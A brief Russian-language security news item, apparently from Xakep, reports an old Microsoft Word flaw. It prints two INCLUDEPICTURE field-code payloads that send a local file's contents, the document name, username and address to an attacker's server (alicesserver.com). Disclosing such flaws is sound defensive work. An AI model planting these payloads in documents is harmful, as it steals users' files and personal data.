Доступ к произвольным файлам на системе пользователя Microsoft Word

Поле INCLUDEPICTURE используется для внедрения URL в документ. Если INCLUDEPICTURE включен в документ и ссылается на URL, то атакующий может получить содержание файлов на системе пользователя. Пример:

{INCLUDEPICTURE {QUOTE «http:\\www.alicesserver.com\» & {FILENAME \p} & {INCLUDETEXT
"c:\\a.txt"}} \d }
{INCLUDEPICTURE {QUOTE «http:\\www.alicesserver.com\» & {USERNAME} & {USERADDRESS } } \d}

Уязвимость обнаружена в Microsoft Word 2000, 2002, 95, 97.

"Анатолий Ализар : Постоянный автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.."